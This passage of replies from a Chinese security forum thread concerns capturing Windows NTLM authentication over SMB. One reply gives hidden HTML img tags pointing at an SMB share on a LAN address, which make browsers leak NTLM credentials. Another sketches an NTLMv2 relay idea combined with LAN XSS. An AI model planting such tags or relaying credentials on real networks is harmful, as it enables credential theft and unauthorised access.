能力值:
( LV2,RANK:10 )
26 楼
好文章!,MARK
能力值:
( LV4,RANK:50 )
27 楼
谢谢楼主分享,探索永无止境
能力值:
( LV2,RANK:10 )
28 楼
看到这个,我瞬间硬了!!!谢谢撸主!
能力值:
( LV2,RANK:10 )
29 楼
虽然不懂但是很吊的感觉
能力值:
( LV2,RANK:10 )
30 楼
mark mark mark
能力值:
( LV9,RANK:170 )
31 楼
网络安全: LAN 管理器身份验证级别
此安全设置确定网络登录使用的质询/响应身份验证协议。此选项会影响客户端使用的身份验证协议的等级、协商的会话安全的等级以及服务器接受的身份验证的等级,其设置值如下:
发送 LM _NTLM 响应: 客户端使用 LM 和 NTLM 身份验证,而决不会使用 NTLMv2 会话安全;域控制器接受 LM、NTLM 和 NTLMv2 身份验证。
发送 LM & NTLM - 如果协商一致,则使用 NTLMv2 会话安全: 客户端使用 LM 和 NTLM 身份验证,并且在服务器支持时使用 NTLMv2 会话安全;域控制器接受 LM、NTLM 和 NTLMv2 身份验证。
仅发送 NTLM 响应: 客户端仅使用 NTLM 身份验证,并且在服务器支持时使用 NTLMv2 会话安全;域控制器接受 LM、NTLM 和 NTLMv2 身份验证。
仅发送 NTLMv2 响应: 客户端仅使用 NTLMv2 身份验证,并且在服务器支持时使用 NTLMv2 会话安全;域控制器接受 LM、NTLM 和 NTLMv2 身份验证。
仅发送 NTLMv2 响应\拒绝 LM: 客户端仅使用 NTLMv2 身份验证,并且在服务器支持时使用 NTLMv2 会话安全;域控制器拒绝 LM (仅接受 NTLM 和 NTLMv2 身份验证)。
仅发送 NTLMv2 响应\拒绝 LM & NTLM: 客户端仅使用 NTLMv2 身份验证,并且在服务器支持时使用 NTLMv2 会话安全;域控制器拒绝 LM 和 NTLM (仅接受 NTLMv2 身份验证)。
重要信息:
此设置会影响运行 Windows 2000 Server、Windows 2000 Professional、Windows XP Professional 以及 Windows Server 2003 家族的计算机与运行 Windows NT 4.0 或更早版本的计算机通过网络进行通信的能力。例如,截至本次编写,运行 Windows NT 4.0 SP4 或更早版本的计算机尚不支持 NTLMv2。运行 Windows 95 和 Windows 98 的计算机尚不支持 NTLM。
默认:
在服务器上发送 LM & NTLM 响应。
在工作站上未定义。
(& )
能力值:
( LV3,RANK:20 )
32 楼
感谢楼主,又看了一遍,结合局域网xss应用,威力很大啊
请教下win7下可有类似的利用方法吗?
我的理解:win7的smb认证过程也是如此,只不过加密方式是ntlmv2,理论上可以抓取密文,但是只是密文不可解,那我们可不可以换种思路,就像令牌伪造,不用解密,首先某被攻击机在xss内快速循环访问攻击机,这时访问某一smb资源,取得challenge,设置攻击机challenge为获得的challenge,等待目标的加密后的ntlmv2密文,然后伪造加密后的ntlmv2密文,就能够以被攻击机的权限访问该smb资源,不知道是否可行?再次感谢楼主
能力值:
( LV15,RANK:280 )
33 楼
没试过。你可以实验一下。期待看到你的实验结果。
能力值:
( LV2,RANK:10 )
34 楼
大神啊 果然牛啊!
能力值:
( LV3,RANK:20 )
35 楼
刚亲测了下,需要主要html to smb link
IE可用
<img src="\\10.1.1.3\Incoming" hidden="true">
firfox要用这个
<img src="file://///10.1.1.3\Incoming" hidden="true">
能力值:
( LV2,RANK:10 )
36 楼
这个应该是ms08-068 现在应该xp修补上了吧,楼主测试的时候是打全补丁测试的?
能力值:
( LV15,RANK:280 )
37 楼
ms08-068是远程代码执行漏洞,非本文所讲。
能力值:
( LV2,RANK:10 )
38 楼
学了一招,在内网用不错的
能力值:
( LV2,RANK:10 )
39 楼
打酱油路过
能力值:
( LV2,RANK:10 )
40 楼
N年前我就实现了
能力值:
( LV2,RANK:10 )
41 楼
确实很不错,慢慢研究,有空动手试一试
能力值:
( LV4,RANK:50 )
42 楼
看看,,观摩观摩。。。
能力值:
( LV2,RANK:10 )
43 楼
很强大啊,试过后再来
能力值:
( LV2,RANK:10 )
44 楼
好东东,学习了
能力值:
( LV7,RANK:100 )
45 楼
这个东西,在01 02年的时候,在xfocus上就玩了。